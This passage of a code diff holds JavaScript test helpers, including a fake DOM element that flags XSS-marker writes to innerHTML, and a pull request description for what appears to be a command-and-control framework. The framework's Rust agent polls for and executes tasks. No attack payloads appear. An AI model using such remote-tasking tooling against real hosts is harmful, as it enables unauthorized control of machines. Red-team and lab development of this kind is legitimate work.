+            return;
+        }
+        await new Promise(resolve => setImmediate(resolve));
+    }
+    assert.fail('Timed out waiting for asynchronous dashboard work');
+}
+
+class FakeElement {
+    constructor(tag) {
+        this.tag = tag;
+        this.children = [];
+        this.className = '';
+        this.textContent = '';
+        this.value = '';
+        this.dataset = {};
+        this.eventListeners = new Map();
+        this.innerHTMLWrites = 0;
+    }
+
+    appendChild(child) {
+        this.children.push(child);
+        return child;
+    }
+
+    hasChildNodes() {
+        return this.children.length > 0;
+    }
+
+    replaceChildren(...children) {
+        this.children = children;
+    }
+
+    addEventListener(event, listener) {
+        const listeners = this.eventListeners.get(event) || [];
+        listeners.push(listener);
+        this.eventListeners.set(event, listeners);
+    }
+
+    click() {
+        for (const listener of this.eventListeners.get('click') || []) {
+            listener({target: this});
+        }
+    }
+
+    set innerHTML(value) {
+        this.innerHTMLWrites++;
+        this.children = [];
+        if (String(value).includes('__dashboardXssTriggered')) {
+            globalThis.__dashboardXssTriggered = true;
+        }
+    }
+}
+
+function findByClass(root, className) {
+    if (!root) {
+        return null;
+    }
+    if (root.className.split(/\s+/).includes(className)) {
+        return root;
+    }
+    for (const child of root.children) {
+        const match = findByClass(child, className);
+        if (match) {
+            return match;
+        }
+    }
+    return null;
+}
+
+function findAllByClass(root, className) {
+    const matches = root.className.split(/\s+/).includes(className) ? [root] : [];
+    for (const child of root.children) {
+        matches.push(...findAllByClass(child, className));
+    }
+    return matches;
+}
+
+function findAllByTag(root, tag) {
+    const matches = root.tag === tag ? [root] : [];
+    for (const child of root.children) {
+        matches.push(...findAllByTag(child, tag));
+    }
+    return matches;
+}


### PR DESCRIPTION
## Summary

- add versioned Task v1, Task Status Update v1, Task Result v1, summary, and page contracts
- implement retry-safe server lifecycle state, dispatch leases, exact idempotency, expiry, bounded histories, deterministic listener ownership, and deprecated raw-command adapters
- migrate the Rust agent to typed polling with a bounded retry outbox, no task re-execution after ambiguous submissions, output limits, and Unix/Windows process-tree cleanup
- move the dashboard to DOM-safe typed task submission, bounded paginated summaries, and on-demand full output
- bound deprecated result pages by count and a 16 MiB encoded response budget
- add schema validation, browser contract tests, and a blocking Windows agent CI job

## Safety boundary

This PR targets `dev` only. It does not promote `dev` to `main`. Runtime agent IDs remain correlation identifiers rather than authentication, so #104 stays the P0 promotion gate and listener tasking remains isolated-lab-only until authenticated enrollment and heartbeat resource bounds land.

## Validation

- `go test ./...`
- `go test -race ./...`
- `go vet ./...`
- `go build -o /tmp/microc2-server ./cmd`
- `cargo fmt --check`
- `cargo test --locked` (50 passed)
- `cargo clippy --locked --all-targets`
- `cargo build --locked`
- `./check_mutation_determinism.sh`
- `node --test server/web/js/*.test.js` (11 passed)
- `node docs/schemas/validate-examples.js`
- shell, JSON, JavaScript, YAML, and diff/format checks

Implements #98 on `dev`. Security promotion gate: #104.